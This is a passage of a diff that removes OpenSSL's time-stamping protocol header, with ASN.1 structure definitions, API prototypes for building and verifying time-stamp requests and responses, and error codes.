-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#include <openssl/x509.h>
-#include <openssl/x509v3.h>
-
-/*
-MessageImprint ::= SEQUENCE  {
-     hashAlgorithm                AlgorithmIdentifier,
-     hashedMessage                OCTET STRING  }
-*/
-
-typedef struct TS_msg_imprint_st {
-	X509_ALGOR *hash_algo;
-	ASN1_OCTET_STRING *hashed_msg;
-} TS_MSG_IMPRINT;
-
-/*
-TimeStampReq ::= SEQUENCE  {
-   version                  INTEGER  { v1(1) },
-   messageImprint           MessageImprint,
-     --a hash algorithm OID and the hash value of the data to be
-     --time-stamped
-   reqPolicy                TSAPolicyId                OPTIONAL,
-   nonce                    INTEGER                    OPTIONAL,
-   certReq                  BOOLEAN                    DEFAULT FALSE,
-   extensions               [0] IMPLICIT Extensions    OPTIONAL  }
-*/
-
-typedef struct TS_req_st {
-	ASN1_INTEGER *version;
-	TS_MSG_IMPRINT *msg_imprint;
-	ASN1_OBJECT *policy_id;		/* OPTIONAL */
-	ASN1_INTEGER *nonce;		/* OPTIONAL */
-	ASN1_BOOLEAN cert_req;		/* DEFAULT FALSE */
-	STACK_OF(X509_EXTENSION) *extensions;	/* [0] OPTIONAL */
-} TS_REQ;
-
-/*
-Accuracy ::= SEQUENCE {
-                seconds        INTEGER           OPTIONAL,
-                millis     [0] INTEGER  (1..999) OPTIONAL,
-                micros     [1] INTEGER  (1..999) OPTIONAL  }
-*/
-
-typedef struct TS_accuracy_st {
-	ASN1_INTEGER *seconds;
-	ASN1_INTEGER *millis;
-	ASN1_INTEGER *micros;
-} TS_ACCURACY;
-
-/*
-TSTInfo ::= SEQUENCE  {
-    version                      INTEGER  { v1(1) },
-    policy                       TSAPolicyId,
-    messageImprint               MessageImprint,
-      -- MUST have the same value as the similar field in
-      -- TimeStampReq
-    serialNumber                 INTEGER,
-     -- Time-Stamping users MUST be ready to accommodate integers
-     -- up to 160 bits.
-    genTime                      GeneralizedTime,
-    accuracy                     Accuracy                 OPTIONAL,
-    ordering                     BOOLEAN             DEFAULT FALSE,
-    nonce                        INTEGER                  OPTIONAL,
-      -- MUST be present if the similar field was present
-      -- in TimeStampReq.  In that case it MUST have the same value.
-    tsa                          [0] GeneralName          OPTIONAL,
-    extensions                   [1] IMPLICIT Extensions  OPTIONAL   }
-*/
-
-typedef struct TS_tst_info_st {
-	ASN1_INTEGER *version;
-	ASN1_OBJECT *policy_id;
-	TS_MSG_IMPRINT *msg_imprint;
-	ASN1_INTEGER *serial;
-	ASN1_GENERALIZEDTIME *time;
-	TS_ACCURACY *accuracy;
-	ASN1_BOOLEAN ordering;
-	ASN1_INTEGER *nonce;
-	GENERAL_NAME *tsa;
-	STACK_OF(X509_EXTENSION) *extensions;
-} TS_TST_INFO;
-
-/*
-PKIStatusInfo ::= SEQUENCE {
-    status        PKIStatus,
-    statusString  PKIFreeText     OPTIONAL,
-    failInfo      PKIFailureInfo  OPTIONAL  }
-
-From RFC 1510 - section 3.1.1:
-PKIFreeText ::= SEQUENCE SIZE (1..MAX) OF UTF8String
-	-- text encoded as UTF-8 String (note:  each UTF8String SHOULD
-	-- include an RFC 1766 language tag to indicate the language
-	-- of the contained text)
-*/
-
-/* Possible values for status. See ts_resp_print.c && ts_resp_verify.c. */
-
-#define	TS_STATUS_GRANTED			0
-#define	TS_STATUS_GRANTED_WITH_MODS		1
-#define	TS_STATUS_REJECTION			2
-#define	TS_STATUS_WAITING			3
-#define	TS_STATUS_REVOCATION_WARNING		4
-#define	TS_STATUS_REVOCATION_NOTIFICATION	5
-
-/* Possible values for failure_info. See ts_resp_print.c && ts_resp_verify.c */
-
-#define	TS_INFO_BAD_ALG			0
-#define	TS_INFO_BAD_REQUEST		2
-#define	TS_INFO_BAD_DATA_FORMAT		5
-#define	TS_INFO_TIME_NOT_AVAILABLE	14
-#define	TS_INFO_UNACCEPTED_POLICY	15
-#define	TS_INFO_UNACCEPTED_EXTENSION	16
-#define	TS_INFO_ADD_INFO_NOT_AVAILABLE	17
-#define	TS_INFO_SYSTEM_FAILURE		25
-
-typedef struct TS_status_info_st {
-	ASN1_INTEGER *status;
-	STACK_OF(ASN1_UTF8STRING) *text;
-	ASN1_BIT_STRING *failure_info;
-} TS_STATUS_INFO;
-
-DECLARE_STACK_OF(ASN1_UTF8STRING)
-
-/*
-TimeStampResp ::= SEQUENCE  {
-     status                  PKIStatusInfo,
-     timeStampToken          TimeStampToken     OPTIONAL }
-*/
-
-typedef struct TS_resp_st {
-	TS_STATUS_INFO *status_info;
-	PKCS7 *token;
-	TS_TST_INFO *tst_info;
-} TS_RESP;
-
-/* The structure below would belong to the ESS component. */
-
-/*
-IssuerSerial ::= SEQUENCE {
-	issuer                   GeneralNames,
-	serialNumber             CertificateSerialNumber
-	}
-*/
-
-typedef struct ESS_issuer_serial {
-	STACK_OF(GENERAL_NAME)	*issuer;
-	ASN1_INTEGER		*serial;
-} ESS_ISSUER_SERIAL;
-
-/*
-ESSCertID ::=  SEQUENCE {
-        certHash                 Hash,
-        issuerSerial             IssuerSerial OPTIONAL
-}
-*/
-
-typedef struct ESS_cert_id {
-	ASN1_OCTET_STRING *hash;	/* Always SHA-1 digest. */
-	ESS_ISSUER_SERIAL *issuer_serial;
-} ESS_CERT_ID;
-
-DECLARE_STACK_OF(ESS_CERT_ID)
-
-/*
-SigningCertificate ::=  SEQUENCE {
-       certs        SEQUENCE OF ESSCertID,
-       policies     SEQUENCE OF PolicyInformation OPTIONAL
-}
-*/
-
-typedef struct ESS_signing_cert {
-	STACK_OF(ESS_CERT_ID) *cert_ids;
-	STACK_OF(POLICYINFO) *policy_info;
-} ESS_SIGNING_CERT;
-
-
-TS_REQ	*TS_REQ_new(void);
-void	TS_REQ_free(TS_REQ *a);
-int	i2d_TS_REQ(const TS_REQ *a, unsigned char **pp);
-TS_REQ	*d2i_TS_REQ(TS_REQ **a, const unsigned char **pp, long length);
-
-TS_REQ	*TS_REQ_dup(TS_REQ *a);
-
-TS_REQ	*d2i_TS_REQ_fp(FILE *fp, TS_REQ **a);
-int	i2d_TS_REQ_fp(FILE *fp, TS_REQ *a);
-TS_REQ	*d2i_TS_REQ_bio(BIO *fp, TS_REQ **a);
-int	i2d_TS_REQ_bio(BIO *fp, TS_REQ *a);
-
-TS_MSG_IMPRINT	*TS_MSG_IMPRINT_new(void);
-void		TS_MSG_IMPRINT_free(TS_MSG_IMPRINT *a);
-int		i2d_TS_MSG_IMPRINT(const TS_MSG_IMPRINT *a, unsigned char **pp);
-TS_MSG_IMPRINT	*d2i_TS_MSG_IMPRINT(TS_MSG_IMPRINT **a,
-		    const unsigned char **pp, long length);
-
-TS_MSG_IMPRINT	*TS_MSG_IMPRINT_dup(TS_MSG_IMPRINT *a);
-
-TS_MSG_IMPRINT	*d2i_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT **a);
-int		i2d_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT *a);
-TS_MSG_IMPRINT	*d2i_TS_MSG_IMPRINT_bio(BIO *fp, TS_MSG_IMPRINT **a);
-int		i2d_TS_MSG_IMPRINT_bio(BIO *fp, TS_MSG_IMPRINT *a);
-
-TS_RESP	*TS_RESP_new(void);
-void	TS_RESP_free(TS_RESP *a);
-int	i2d_TS_RESP(const TS_RESP *a, unsigned char **pp);
-TS_RESP	*d2i_TS_RESP(TS_RESP **a, const unsigned char **pp, long length);
-TS_TST_INFO *PKCS7_to_TS_TST_INFO(PKCS7 *token);
-TS_RESP	*TS_RESP_dup(TS_RESP *a);
-
-TS_RESP	*d2i_TS_RESP_fp(FILE *fp, TS_RESP **a);
-int	i2d_TS_RESP_fp(FILE *fp, TS_RESP *a);
-TS_RESP	*d2i_TS_RESP_bio(BIO *fp, TS_RESP **a);
-int	i2d_TS_RESP_bio(BIO *fp, TS_RESP *a);
-
-TS_STATUS_INFO	*TS_STATUS_INFO_new(void);
-void		TS_STATUS_INFO_free(TS_STATUS_INFO *a);
-int		i2d_TS_STATUS_INFO(const TS_STATUS_INFO *a, unsigned char **pp);
-TS_STATUS_INFO	*d2i_TS_STATUS_INFO(TS_STATUS_INFO **a,
-		    const unsigned char **pp, long length);
-TS_STATUS_INFO	*TS_STATUS_INFO_dup(TS_STATUS_INFO *a);
-
-TS_TST_INFO	*TS_TST_INFO_new(void);
-void		TS_TST_INFO_free(TS_TST_INFO *a);
-int		i2d_TS_TST_INFO(const TS_TST_INFO *a, unsigned char **pp);
-TS_TST_INFO	*d2i_TS_TST_INFO(TS_TST_INFO **a, const unsigned char **pp,
-		    long length);
-TS_TST_INFO	*TS_TST_INFO_dup(TS_TST_INFO *a);
-
-TS_TST_INFO	*d2i_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO **a);
-int		i2d_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO *a);
-TS_TST_INFO	*d2i_TS_TST_INFO_bio(BIO *fp, TS_TST_INFO **a);
-int		i2d_TS_TST_INFO_bio(BIO *fp, TS_TST_INFO *a);
-
-TS_ACCURACY	*TS_ACCURACY_new(void);
-void		TS_ACCURACY_free(TS_ACCURACY *a);
-int		i2d_TS_ACCURACY(const TS_ACCURACY *a, unsigned char **pp);
-TS_ACCURACY	*d2i_TS_ACCURACY(TS_ACCURACY **a, const unsigned char **pp,
-		    long length);
-TS_ACCURACY	*TS_ACCURACY_dup(TS_ACCURACY *a);
-
-ESS_ISSUER_SERIAL *ESS_ISSUER_SERIAL_new(void);
-void		  ESS_ISSUER_SERIAL_free(ESS_ISSUER_SERIAL *a);
-int		  i2d_ESS_ISSUER_SERIAL(const ESS_ISSUER_SERIAL *a,
-		    unsigned char **pp);
-ESS_ISSUER_SERIAL *d2i_ESS_ISSUER_SERIAL(ESS_ISSUER_SERIAL **a,
-		    const unsigned char **pp, long length);
-ESS_ISSUER_SERIAL *ESS_ISSUER_SERIAL_dup(ESS_ISSUER_SERIAL *a);
-
-ESS_CERT_ID	*ESS_CERT_ID_new(void);
-void		ESS_CERT_ID_free(ESS_CERT_ID *a);
-int		i2d_ESS_CERT_ID(const ESS_CERT_ID *a, unsigned char **pp);
-ESS_CERT_ID	*d2i_ESS_CERT_ID(ESS_CERT_ID **a, const unsigned char **pp,
-		    long length);
-ESS_CERT_ID	*ESS_CERT_ID_dup(ESS_CERT_ID *a);
-
-ESS_SIGNING_CERT *ESS_SIGNING_CERT_new(void);
-void		 ESS_SIGNING_CERT_free(ESS_SIGNING_CERT *a);
-int		 i2d_ESS_SIGNING_CERT(const ESS_SIGNING_CERT *a,
-		    unsigned char **pp);
-ESS_SIGNING_CERT *d2i_ESS_SIGNING_CERT(ESS_SIGNING_CERT **a,
-		    const unsigned char **pp, long length);
-ESS_SIGNING_CERT *ESS_SIGNING_CERT_dup(ESS_SIGNING_CERT *a);
-
-void ERR_load_TS_strings(void);
-
-int TS_REQ_set_version(TS_REQ *a, long version);
-long TS_REQ_get_version(const TS_REQ *a);
-
-int TS_REQ_set_msg_imprint(TS_REQ *a, TS_MSG_IMPRINT *msg_imprint);
-TS_MSG_IMPRINT *TS_REQ_get_msg_imprint(TS_REQ *a);
-
-int TS_MSG_IMPRINT_set_algo(TS_MSG_IMPRINT *a, X509_ALGOR *alg);
-X509_ALGOR *TS_MSG_IMPRINT_get_algo(TS_MSG_IMPRINT *a);
-
-int TS_MSG_IMPRINT_set_msg(TS_MSG_IMPRINT *a, unsigned char *d, int len);
-ASN1_OCTET_STRING *TS_MSG_IMPRINT_get_msg(TS_MSG_IMPRINT *a);
-
-int TS_REQ_set_policy_id(TS_REQ *a, ASN1_OBJECT *policy);
-ASN1_OBJECT *TS_REQ_get_policy_id(TS_REQ *a);
-
-int TS_REQ_set_nonce(TS_REQ *a, const ASN1_INTEGER *nonce);
-const ASN1_INTEGER *TS_REQ_get_nonce(const TS_REQ *a);
-
-int TS_REQ_set_cert_req(TS_REQ *a, int cert_req);
-int TS_REQ_get_cert_req(const TS_REQ *a);
-
-STACK_OF(X509_EXTENSION) *TS_REQ_get_exts(TS_REQ *a);
-void TS_REQ_ext_free(TS_REQ *a);
-int TS_REQ_get_ext_count(TS_REQ *a);
-int TS_REQ_get_ext_by_NID(TS_REQ *a, int nid, int lastpos);
-int TS_REQ_get_ext_by_OBJ(TS_REQ *a, ASN1_OBJECT *obj, int lastpos);
-int TS_REQ_get_ext_by_critical(TS_REQ *a, int crit, int lastpos);
-X509_EXTENSION *TS_REQ_get_ext(TS_REQ *a, int loc);
-X509_EXTENSION *TS_REQ_delete_ext(TS_REQ *a, int loc);
-int TS_REQ_add_ext(TS_REQ *a, X509_EXTENSION *ex, int loc);
-void *TS_REQ_get_ext_d2i(TS_REQ *a, int nid, int *crit, int *idx);
-
-/* Function declarations for TS_REQ defined in ts/ts_req_print.c */
-
-int TS_REQ_print_bio(BIO *bio, TS_REQ *a);
-
-/* Function declarations for TS_RESP defined in ts/ts_resp_utils.c */
-
-int TS_RESP_set_status_info(TS_RESP *a, TS_STATUS_INFO *info);
-TS_STATUS_INFO *TS_RESP_get_status_info(TS_RESP *a);
-
-/* Caller loses ownership of PKCS7 and TS_TST_INFO objects. */
-void TS_RESP_set_tst_info(TS_RESP *a, PKCS7 *p7, TS_TST_INFO *tst_info);
-PKCS7 *TS_RESP_get_token(TS_RESP *a);
-TS_TST_INFO *TS_RESP_get_tst_info(TS_RESP *a);
-
-int TS_TST_INFO_set_version(TS_TST_INFO *a, long version);
-long TS_TST_INFO_get_version(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_policy_id(TS_TST_INFO *a, ASN1_OBJECT *policy_id);
-ASN1_OBJECT *TS_TST_INFO_get_policy_id(TS_TST_INFO *a);
-
-int TS_TST_INFO_set_msg_imprint(TS_TST_INFO *a, TS_MSG_IMPRINT *msg_imprint);
-TS_MSG_IMPRINT *TS_TST_INFO_get_msg_imprint(TS_TST_INFO *a);
-
-int TS_TST_INFO_set_serial(TS_TST_INFO *a, const ASN1_INTEGER *serial);
-const ASN1_INTEGER *TS_TST_INFO_get_serial(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_time(TS_TST_INFO *a, const ASN1_GENERALIZEDTIME *gtime);
-const ASN1_GENERALIZEDTIME *TS_TST_INFO_get_time(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_accuracy(TS_TST_INFO *a, TS_ACCURACY *accuracy);
-TS_ACCURACY *TS_TST_INFO_get_accuracy(TS_TST_INFO *a);
-
-int TS_ACCURACY_set_seconds(TS_ACCURACY *a, const ASN1_INTEGER *seconds);
-const ASN1_INTEGER *TS_ACCURACY_get_seconds(const TS_ACCURACY *a);
-
-int TS_ACCURACY_set_millis(TS_ACCURACY *a, const ASN1_INTEGER *millis);
-const ASN1_INTEGER *TS_ACCURACY_get_millis(const TS_ACCURACY *a);
-
-int TS_ACCURACY_set_micros(TS_ACCURACY *a, const ASN1_INTEGER *micros);
-const ASN1_INTEGER *TS_ACCURACY_get_micros(const TS_ACCURACY *a);
-
-int TS_TST_INFO_set_ordering(TS_TST_INFO *a, int ordering);
-int TS_TST_INFO_get_ordering(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_nonce(TS_TST_INFO *a, const ASN1_INTEGER *nonce);
-const ASN1_INTEGER *TS_TST_INFO_get_nonce(const TS_TST_INFO *a);
-
-int TS_TST_INFO_set_tsa(TS_TST_INFO *a, GENERAL_NAME *tsa);
-GENERAL_NAME *TS_TST_INFO_get_tsa(TS_TST_INFO *a);
-
-STACK_OF(X509_EXTENSION) *TS_TST_INFO_get_exts(TS_TST_INFO *a);
-void TS_TST_INFO_ext_free(TS_TST_INFO *a);
-int TS_TST_INFO_get_ext_count(TS_TST_INFO *a);
-int TS_TST_INFO_get_ext_by_NID(TS_TST_INFO *a, int nid, int lastpos);
-int TS_TST_INFO_get_ext_by_OBJ(TS_TST_INFO *a, ASN1_OBJECT *obj, int lastpos);
-int TS_TST_INFO_get_ext_by_critical(TS_TST_INFO *a, int crit, int lastpos);
-X509_EXTENSION *TS_TST_INFO_get_ext(TS_TST_INFO *a, int loc);
-X509_EXTENSION *TS_TST_INFO_delete_ext(TS_TST_INFO *a, int loc);
-int TS_TST_INFO_add_ext(TS_TST_INFO *a, X509_EXTENSION *ex, int loc);
-void *TS_TST_INFO_get_ext_d2i(TS_TST_INFO *a, int nid, int *crit, int *idx);
-
-/* Declarations related to response generation, defined in ts/ts_resp_sign.c. */
-
-/* Optional flags for response generation. */
-
-/* Don't include the TSA name in response. */
-#define	TS_TSA_NAME		0x01
-
-/* Set ordering to true in response. */
-#define	TS_ORDERING		0x02
-
-/*
- * Include the signer certificate and the other specified certificates in
- * the ESS signing certificate attribute beside the PKCS7 signed data.
- * Only the signer certificates is included by default.
- */
-#define	TS_ESS_CERT_ID_CHAIN	0x04
-
-/* Forward declaration. */
-struct TS_resp_ctx;
-
-/* This must return a unique number less than 160 bits long. */
-typedef ASN1_INTEGER *(*TS_serial_cb)(struct TS_resp_ctx *, void *);
-
-/* This must return the seconds and microseconds since Jan 1, 1970 in
-   the sec and usec variables allocated by the caller.
-   Return non-zero for success and zero for failure. */
-typedef	int (*TS_time_cb)(struct TS_resp_ctx *, void *, time_t *sec, long *usec);
-
-/* This must process the given extension.
- * It can modify the TS_TST_INFO object of the context.
- * Return values: !0 (processed), 0 (error, it must set the
- * status info/failure info of the response).
- */
-typedef	int (*TS_extension_cb)(struct TS_resp_ctx *, X509_EXTENSION *, void *);
-
-typedef struct TS_resp_ctx {
-	X509		*signer_cert;
-	EVP_PKEY	*signer_key;
-	STACK_OF(X509)	*certs;	/* Certs to include in signed data. */
-	STACK_OF(ASN1_OBJECT)	*policies;	/* Acceptable policies. */
-	ASN1_OBJECT	*default_policy; /* It may appear in policies, too. */
-	STACK_OF(EVP_MD)	*mds;	/* Acceptable message digests. */
-	ASN1_INTEGER	*seconds;	/* accuracy, 0 means not specified. */
-	ASN1_INTEGER	*millis;	/* accuracy, 0 means not specified. */
-	ASN1_INTEGER	*micros;	/* accuracy, 0 means not specified. */
-	unsigned	clock_precision_digits; /* fraction of seconds in
-						   time stamp token. */
-	unsigned	flags;		/* Optional info, see values above. */
-
-	/* Callback functions. */
-	TS_serial_cb serial_cb;
-	void *serial_cb_data;	/* User data for serial_cb. */
-
-	TS_time_cb time_cb;
-	void *time_cb_data;	/* User data for time_cb. */
-
-	TS_extension_cb extension_cb;
-	void *extension_cb_data;	/* User data for extension_cb. */
-
-	/* These members are used only while creating the response. */
-	TS_REQ		*request;
-	TS_RESP		*response;
-	TS_TST_INFO	*tst_info;
-} TS_RESP_CTX;
-
-DECLARE_STACK_OF(EVP_MD)
-
-/* Creates a response context that can be used for generating responses. */
-TS_RESP_CTX *TS_RESP_CTX_new(void);
-void TS_RESP_CTX_free(TS_RESP_CTX *ctx);
-
-/* This parameter must be set. */
-int TS_RESP_CTX_set_signer_cert(TS_RESP_CTX *ctx, X509 *signer);
-
-/* This parameter must be set. */
-int TS_RESP_CTX_set_signer_key(TS_RESP_CTX *ctx, EVP_PKEY *key);
-
-/* This parameter must be set. */
-int TS_RESP_CTX_set_def_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *def_policy);
-
-/* No additional certs are included in the response by default. */
-int TS_RESP_CTX_set_certs(TS_RESP_CTX *ctx, STACK_OF(X509) *certs);
-
-/* Adds a new acceptable policy, only the default policy
-   is accepted by default. */
-int TS_RESP_CTX_add_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *policy);
-
-/* Adds a new acceptable message digest. Note that no message digests
-   are accepted by default. The md argument is shared with the caller. */
-int TS_RESP_CTX_add_md(TS_RESP_CTX *ctx, const EVP_MD *md);
-
-/* Accuracy is not included by default. */
-int TS_RESP_CTX_set_accuracy(TS_RESP_CTX *ctx,
-    int secs, int millis, int micros);
-
-/* Clock precision digits, i.e. the number of decimal digits:
-   '0' means sec, '3' msec, '6' usec, and so on. Default is 0. */
-int TS_RESP_CTX_set_clock_precision_digits(TS_RESP_CTX *ctx,
-    unsigned clock_precision_digits);
-/* At most we accept usec precision. */
-#define TS_MAX_CLOCK_PRECISION_DIGITS	6
-
-/* No flags are set by default. */
-void TS_RESP_CTX_add_flags(TS_RESP_CTX *ctx, int flags);
-
-/* Default callback always returns a constant. */
-void TS_RESP_CTX_set_serial_cb(TS_RESP_CTX *ctx, TS_serial_cb cb, void *data);
-
-/* Default callback rejects all extensions. The extension callback is called
- * when the TS_TST_INFO object is already set up and not signed yet. */
-/* FIXME: extension handling is not tested yet. */
-void TS_RESP_CTX_set_extension_cb(TS_RESP_CTX *ctx,
-    TS_extension_cb cb, void *data);
-
-/* The following methods can be used in the callbacks. */
-int TS_RESP_CTX_set_status_info(TS_RESP_CTX *ctx,
-    int status, const char *text);
-
-/* Sets the status info only if it is still TS_STATUS_GRANTED. */
-int TS_RESP_CTX_set_status_info_cond(TS_RESP_CTX *ctx,
-    int status, const char *text);
-
-int TS_RESP_CTX_add_failure_info(TS_RESP_CTX *ctx, int failure);
-
-/* The get methods below can be used in the extension callback. */
-TS_REQ *TS_RESP_CTX_get_request(TS_RESP_CTX *ctx);
-
-TS_TST_INFO *TS_RESP_CTX_get_tst_info(TS_RESP_CTX *ctx);
-
-/*
- * Creates the signed TS_TST_INFO and puts it in TS_RESP.
- * In case of errors it sets the status info properly.
- * Returns NULL only in case of memory allocation/fatal error.
- */
-TS_RESP *TS_RESP_create_response(TS_RESP_CTX *ctx, BIO *req_bio);
-
-/*
- * Declarations related to response verification,
- * they are defined in ts/ts_resp_verify.c.
- */
-
-int TS_RESP_verify_signature(PKCS7 *token, STACK_OF(X509) *certs,
-    X509_STORE *store, X509 **signer_out);
-
-/* Context structure for the generic verify method. */
-
-/* Verify the signer's certificate and the signature of the response. */
-#define	TS_VFY_SIGNATURE	(1u << 0)
-/* Verify the version number of the response. */
-#define	TS_VFY_VERSION		(1u << 1)
-/* Verify if the policy supplied by the user matches the policy of the TSA. */
-#define	TS_VFY_POLICY		(1u << 2)
-/* Verify the message imprint provided by the user. This flag should not be
-   specified with TS_VFY_DATA. */
-#define	TS_VFY_IMPRINT		(1u << 3)
-/* Verify the message imprint computed by the verify method from the user
-   provided data and the MD algorithm of the response. This flag should not be
-   specified with TS_VFY_IMPRINT. */
-#define	TS_VFY_DATA		(1u << 4)
-/* Verify the nonce value. */
-#define	TS_VFY_NONCE		(1u << 5)
-/* Verify if the TSA name field matches the signer certificate. */
-#define	TS_VFY_SIGNER		(1u << 6)
-/* Verify if the TSA name field equals to the user provided name. */
-#define	TS_VFY_TSA_NAME		(1u << 7)
-
-/* You can use the following convenience constants. */
-#define	TS_VFY_ALL_IMPRINT	(TS_VFY_SIGNATURE	\
-				 | TS_VFY_VERSION	\
-				 | TS_VFY_POLICY	\
-				 | TS_VFY_IMPRINT	\
-				 | TS_VFY_NONCE		\
-				 | TS_VFY_SIGNER	\
-				 | TS_VFY_TSA_NAME)
-#define	TS_VFY_ALL_DATA		(TS_VFY_SIGNATURE	\
-				 | TS_VFY_VERSION	\
-				 | TS_VFY_POLICY	\
-				 | TS_VFY_DATA		\
-				 | TS_VFY_NONCE		\
-				 | TS_VFY_SIGNER	\
-				 | TS_VFY_TSA_NAME)
-
-typedef struct TS_verify_ctx {
-	/* Set this to the union of TS_VFY_... flags you want to carry out. */
-	unsigned	flags;
-
-	/* Must be set only with TS_VFY_SIGNATURE. certs is optional. */
-	X509_STORE	*store;
-	STACK_OF(X509)	*certs;
-
-	/* Must be set only with TS_VFY_POLICY. */
-	ASN1_OBJECT	*policy;
-
-	/* Must be set only with TS_VFY_IMPRINT. If md_alg is NULL,
-	   the algorithm from the response is used. */
-	X509_ALGOR	*md_alg;
-	unsigned char	*imprint;
-	unsigned	imprint_len;
-
-	/* Must be set only with TS_VFY_DATA. */
-	BIO		*data;
-
-	/* Must be set only with TS_VFY_TSA_NAME. */
-	ASN1_INTEGER	*nonce;
-
-	/* Must be set only with TS_VFY_TSA_NAME. */
-	GENERAL_NAME	*tsa_name;
-} TS_VERIFY_CTX;
-
-int TS_RESP_verify_response(TS_VERIFY_CTX *ctx, TS_RESP *response);
-int TS_RESP_verify_token(TS_VERIFY_CTX *ctx, PKCS7 *token);
-
-/*
- * Declarations related to response verification context,
- * they are defined in ts/ts_verify_ctx.c.
- */
-
-/* Set all fields to zero. */
-TS_VERIFY_CTX *TS_VERIFY_CTX_new(void);
-void TS_VERIFY_CTX_init(TS_VERIFY_CTX *ctx);
-void TS_VERIFY_CTX_free(TS_VERIFY_CTX *ctx);
-void TS_VERIFY_CTX_cleanup(TS_VERIFY_CTX *ctx);
-
-/*
- * If ctx is NULL, it allocates and returns a new object, otherwise
- * it returns ctx. It initialises all the members as follows:
- * flags = TS_VFY_ALL_IMPRINT & ~(TS_VFY_TSA_NAME | TS_VFY_SIGNATURE)
- * certs = NULL
- * store = NULL
- * policy = policy from the request or NULL if absent (in this case
- *	TS_VFY_POLICY is cleared from flags as well)
- * md_alg = MD algorithm from request
- * imprint, imprint_len = imprint from request
- * data = NULL
- * nonce, nonce_len = nonce from the request or NULL if absent (in this case
- * 	TS_VFY_NONCE is cleared from flags as well)
- * tsa_name = NULL
- * Important: after calling this method TS_VFY_SIGNATURE should be added!
- */
-TS_VERIFY_CTX *TS_REQ_to_TS_VERIFY_CTX(TS_REQ *req, TS_VERIFY_CTX *ctx);
-
-/* Function declarations for TS_RESP defined in ts/ts_resp_print.c */
-
-int TS_RESP_print_bio(BIO *bio, TS_RESP *a);
-int TS_STATUS_INFO_print_bio(BIO *bio, TS_STATUS_INFO *a);
-int TS_TST_INFO_print_bio(BIO *bio, TS_TST_INFO *a);
-
-/* Common utility functions defined in ts/ts_lib.c */
-
-int TS_ASN1_INTEGER_print_bio(BIO *bio, const ASN1_INTEGER *num);
-int TS_OBJ_print_bio(BIO *bio, const ASN1_OBJECT *obj);
-int TS_ext_print_bio(BIO *bio, const STACK_OF(X509_EXTENSION) *extensions);
-int TS_X509_ALGOR_print_bio(BIO *bio, const X509_ALGOR *alg);
-int TS_MSG_IMPRINT_print_bio(BIO *bio, TS_MSG_IMPRINT *msg);
-
-/* Function declarations for handling configuration options,
-   defined in ts/ts_conf.c */
-
-X509 *TS_CONF_load_cert(const char *file);
-STACK_OF(X509) *TS_CONF_load_certs(const char *file);
-EVP_PKEY *TS_CONF_load_key(const char *file, const char *pass);
-const char *TS_CONF_get_tsa_section(CONF *conf, const char *section);
-int TS_CONF_set_serial(CONF *conf, const char *section, TS_serial_cb cb,
-    TS_RESP_CTX *ctx);
-int TS_CONF_set_crypto_device(CONF *conf, const char *section,
-    const char *device);
-int TS_CONF_set_default_engine(const char *name);
-int TS_CONF_set_signer_cert(CONF *conf, const char *section,
-    const char *cert, TS_RESP_CTX *ctx);
-int TS_CONF_set_certs(CONF *conf, const char *section, const char *certs,
-    TS_RESP_CTX *ctx);
-int TS_CONF_set_signer_key(CONF *conf, const char *section,
-    const char *key, const char *pass, TS_RESP_CTX *ctx);
-int TS_CONF_set_def_policy(CONF *conf, const char *section,
-    const char *policy, TS_RESP_CTX *ctx);
-int TS_CONF_set_policies(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_digests(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_accuracy(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_clock_precision_digits(CONF *conf, const char *section,
-    TS_RESP_CTX *ctx);
-int TS_CONF_set_ordering(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_tsa_name(CONF *conf, const char *section, TS_RESP_CTX *ctx);
-int TS_CONF_set_ess_cert_id_chain(CONF *conf, const char *section,
-    TS_RESP_CTX *ctx);
-
-/* -------------------------------------------------- */
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_TS_strings(void);
-
-/* Error codes for the TS functions. */
-
-/* Function codes. */
-#define TS_F_D2I_TS_RESP				 147
-#define TS_F_DEF_SERIAL_CB				 110
-#define TS_F_DEF_TIME_CB				 111
-#define TS_F_ESS_ADD_SIGNING_CERT			 112
-#define TS_F_ESS_CERT_ID_NEW_INIT			 113
-#define TS_F_ESS_SIGNING_CERT_NEW_INIT			 114
-#define TS_F_INT_TS_RESP_VERIFY_TOKEN			 149
-#define TS_F_PKCS7_TO_TS_TST_INFO			 148
-#define TS_F_TS_ACCURACY_SET_MICROS			 115
-#define TS_F_TS_ACCURACY_SET_MILLIS			 116
-#define TS_F_TS_ACCURACY_SET_SECONDS			 117
-#define TS_F_TS_CHECK_IMPRINTS				 100
-#define TS_F_TS_CHECK_NONCES				 101
-#define TS_F_TS_CHECK_POLICY				 102
-#define TS_F_TS_CHECK_SIGNING_CERTS			 103
-#define TS_F_TS_CHECK_STATUS_INFO			 104
-#define TS_F_TS_COMPUTE_IMPRINT				 145
-#define TS_F_TS_CONF_SET_DEFAULT_ENGINE			 146
-#define TS_F_TS_GET_STATUS_TEXT				 105
-#define TS_F_TS_MSG_IMPRINT_SET_ALGO			 118
-#define TS_F_TS_REQ_SET_MSG_IMPRINT			 119
-#define TS_F_TS_REQ_SET_NONCE				 120
-#define TS_F_TS_REQ_SET_POLICY_ID			 121
-#define TS_F_TS_RESP_CREATE_RESPONSE			 122
-#define TS_F_TS_RESP_CREATE_TST_INFO			 123
-#define TS_F_TS_RESP_CTX_ADD_FAILURE_INFO		 124
-#define TS_F_TS_RESP_CTX_ADD_MD				 125
-#define TS_F_TS_RESP_CTX_ADD_POLICY			 126
-#define TS_F_TS_RESP_CTX_NEW				 127
-#define TS_F_TS_RESP_CTX_SET_ACCURACY			 128
-#define TS_F_TS_RESP_CTX_SET_CERTS			 129
